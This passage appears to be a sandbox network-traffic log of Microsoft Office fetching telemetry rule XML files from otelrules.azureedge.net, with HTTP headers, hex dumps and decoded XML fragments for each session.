                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                                                                                                                                                                                ETag: "0x8DC582B942B6AFF"
                                                                                                                                                                                                x-ms-request-id: 964846c7-701e-001e-36c3-3bf5e6000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155433Z-15b8b599d88phfhnhC1TEBr51n00000003a0000000006m9y
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:33 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                89192.168.2.44992013.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:33 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:33 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 472
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                ETag: "0x8DC582B984BF177"
                                                                                                                                                                                                x-ms-request-id: 18e5e448-501e-000a-7b67-3b0180000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155433Z-178bfbc474bmqmgjhC1NYCy16c00000004qg00000000dgfc
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:33 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                90192.168.2.44992213.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:33 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:33 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 468
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                ETag: "0x8DC582BBA642BF4"
                                                                                                                                                                                                x-ms-request-id: 26217b89-b01e-001e-808c-3a0214000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155433Z-178bfbc474b9fdhphC1NYCac0n00000004g000000000hnad
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:33 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                91192.168.2.44992313.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:33 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:34 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:34 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 174
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                                                ETag: "0x8DC582B91D80E15"
                                                                                                                                                                                                x-ms-request-id: 5a5a0c5e-c01e-0079-588c-3ae51a000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155434Z-174c587ffdfcj798hC1TEB9bq4000000037000000000mu5a
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:34 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                92192.168.2.44992413.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:35 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:36 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:35 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1952
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                                                ETag: "0x8DC582B956B0F3D"
                                                                                                                                                                                                x-ms-request-id: abed2815-c01e-0046-0275-3d2db9000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155435Z-15b8b599d8885prmhC1TEBsnkw00000003b0000000003nym
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:36 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                93192.168.2.44992613.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:35 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:36 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:36 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 501
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                                                                                                                                                                                ETag: "0x8DC582BACFDAACD"
                                                                                                                                                                                                x-ms-request-id: 6a1e2df9-c01e-008d-338c-3a2eec000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155436Z-174c587ffdfgcs66hC1TEB69cs0000000310000000008736
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:36 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                94192.168.2.44992513.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:35 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:36 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:36 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 958
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                                                                                                                                                                                ETag: "0x8DC582BA0A31B3B"
                                                                                                                                                                                                x-ms-request-id: 4857c71c-401e-0067-7e3a-3c09c2000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155436Z-15b8b599d88cn5thhC1TEBqxkn00000002zg00000000drxy
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:36 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                95192.168.2.44992713.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:35 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:36 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:36 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 2592
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                ETag: "0x8DC582BB5B890DB"
                                                                                                                                                                                                x-ms-request-id: bc0c8c97-701e-0053-1e45-3c3a0a000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155436Z-178bfbc474b9fdhphC1NYCac0n00000004qg000000001f8k
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:36 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                96192.168.2.44992813.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:36 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:36 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:36 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 3342
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                                                                                                                                                                                ETag: "0x8DC582B927E47E9"
                                                                                                                                                                                                x-ms-request-id: 21def030-601e-0084-7c7b-3b6b3f000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155436Z-174c587ffdf7t49mhC1TEB4qbg000000032g000000009z5b
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:36 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                97192.168.2.44993013.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:37 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:38 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:38 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1393
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                                                                                                                                                                                ETag: "0x8DC582BE3E55B6E"
                                                                                                                                                                                                x-ms-request-id: 6e9ce571-001e-005a-0843-3cc3d0000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155438Z-15b8b599d88s6mj9hC1TEBur30000000032g0000000015mq
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:38 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                98192.168.2.44993113.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:38 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
